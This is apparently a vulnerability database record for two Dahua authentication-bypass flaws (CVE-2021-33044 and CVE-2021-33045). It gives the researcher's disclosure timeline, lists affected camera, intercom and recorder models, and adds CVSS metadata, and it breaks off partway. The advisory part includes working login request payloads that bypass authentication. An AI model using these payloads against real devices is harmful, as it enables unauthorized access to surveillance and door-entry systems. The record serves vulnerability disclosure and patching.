    -=[Timeline]=- June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) June 17, 2021: Sent reminder to Dahua PSIRT June 18, 2021: Asked IPVM for help to get in contact with Dahua June 18, 2021: Received ACK from IPVM, told they sent note to Dahua June 19, 2021: ACK received from Dahua PSIRT, asked for additional details June 19, 2021: Additional details including PoC sent June 21, 2021: ACK received, vulnerabilites confirmed June 23, 2021: Dahua PSIRT asked for "coordinated disclosure" June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now June 24, 2021: Received CVE-2021-33044, I asked about the second CVE July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure" July 04, 2021: Confirmed "coordinated disclosure", once again July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021, August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note August 30, 2021: Sent my "Limited Disclosure" note September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches September 6, 2021: Limited Disclosure October 6, 2021: Full Disclosure

    -=[NetKeyboard Vulnerability]=-

    CVE-2021-33044

    Vulnerability: "clientType": "NetKeyboard", Vulnerable device types: IPC/VTH/VTO (tested) Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021) Protocol: DHIP and HTTP/HTTPS

    Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.

    Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}

    [Example] { "method": "global.login", "params": { "userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "Not Used" }, "id": 1, "session": 0 }

    -=[Loopback Vulnerability]=-

    CVE-2021-33045

    Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local",

    Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) Vulnerable Firmware: Firmware version older than beginning/mid 2020. Protocol: DHIP

    Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.

    Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}

    [Example] Random MD5 with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Default", "password": "[REDACTED]" }, "id": 1, "session": 0 }

    Plain text with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 }

    [ETX]

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-1874",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ipc-hum7xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.820.0000000.5.r.210705"
          },
          {
            "model": "xvr-5x16",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.001.0000003.1.r.210710"
          },
          {
            "model": "vto-75x95x",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.300.0000003.0.r.210714"
          },
          {
            "model": "ipc-hx5xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.820.0000000.5.r.210705"
          },
          {
            "model": "vth-542xh",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.500.0000002.0.r.210715"
          },
          {
            "model": "xvr-4x04",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.001.0000001.1.r.210709"
          },
          {
            "model": "vto-65xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.300.0000004.0.r.210715"
          },
          {
            "model": "xvr-5x08",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.001.0000003.1.r.210710"
          },
          {
            "model": "xvr-4x08",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.001.0000001.1.r.210709"
          },
          {
            "model": "nvr-6xx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.001.0000001.1.r.210716"
          },
          {
            "model": "ipc-hx3xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.800.0000000.29.r.210630"
          },
          {
            "model": "nvr-5xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.001.0000000.0.r.210710"
          },
          {
            "model": "xvr-7x32",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.001.0000003.1.r.210710"
          },
          {
            "model": "xvr-7x16",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.001.0000003.1.r.210710"
          },
          {
            "model": "nvr-2xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.001.0000000.1.r.210710"
          },
          {
            "model": "xvr-5x04",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.001.0000003.1.r.210710"
          },
          {
            "model": "xvr-4x04",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "nvr-4xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.001.0000005.1.r.210713"
          },
          {
            "model": "nvr-1xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.001.0000005.1.r.210709"
          },
          {
            "model": "vth-542xh",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "vto-65xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr-4xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr-6xx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hx5xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hx3xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr-5xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr-2xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr-1xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hum7xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hx3xxx versions which build time before may",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2020"
          },
          {
            "model": "hx5xxx versions which build time before may",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2020"
          },
          {
            "model": "hum7xxx versions which build time before may",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2020"
          },
          {
            "model": "vto75x95x versions which build time before december",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2019"
          },
          {
            "model": "vto65xxx versions which build time before december",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2019"
          },
          {
            "model": "vth542xh versions which build time before december",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2019"
          },
          {
            "model": "nvr1xxx versions which build time before december",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2019"
          },
          {
            "model": "nvr2xxx versions which build time before december",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2019"
          },
          {
            "model": "nvr5xxx versions which build time before december",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2019"
          },
          {
            "model": "nvr6xx versions which build time before december",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2019"
          },
          {
            "model": "xvr4xxx versions which build time before december",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2019"
          },
          {
            "model": "xvr5xxx versions which build time before december",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2019"
          },
          {
            "model": "xvr7xxx versions which build time before december",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2019"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103420"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70815"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012414"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33045"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.820.0000000.5.r.210705",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hum7xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx3xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.800.0000000.29.r.210630",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx3xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx5xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.820.0000000.5.r.210705",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx5xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-1xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.001.0000005.1.r.210709",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-1xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-2xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.001.0000000.1.r.210710",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-2xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-4xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.001.0000005.1.r.210713",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-4xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-5xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.001.0000000.0.r.210710",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-5xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-6xx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.001.0000001.1.r.210716",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-6xx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:vth-542xh_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.500.0000002.0.r.210715",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:vth-542xh:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-65xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.300.0000004.0.r.210715",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-65xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-75x95x_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.300.0000003.0.r.210714",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-75x95x:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-4x04_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-4x04:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-4x08_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.001.0000001.1.r.210709",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-4x08:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-4x04_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.001.0000001.1.r.210709",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-4x04:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-5x04_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.001.0000003.1.r.210710",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-5x04:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-5x08_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.001.0000003.1.r.210710",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-5x08:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-5x16_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.001.0000003.1.r.210710",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-5x16:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-7x16_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.001.0000003.1.r.210710",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-7x16:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-7x32_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.001.0000003.1.r.210710",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-7x32:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33045"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "bashis",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164423"
          }
        ],
        "trust": 0.1
      },
      "cve": "CVE-2021-33045",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2021-33045",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2021-103420",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "HIGH",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.6,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 4.9,
                "id": "CNVD-2021-70815",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2021-33045",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2021-33045",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-103420",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-70815",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202109-1081",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103420"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70815"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012414"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33045"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1081"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
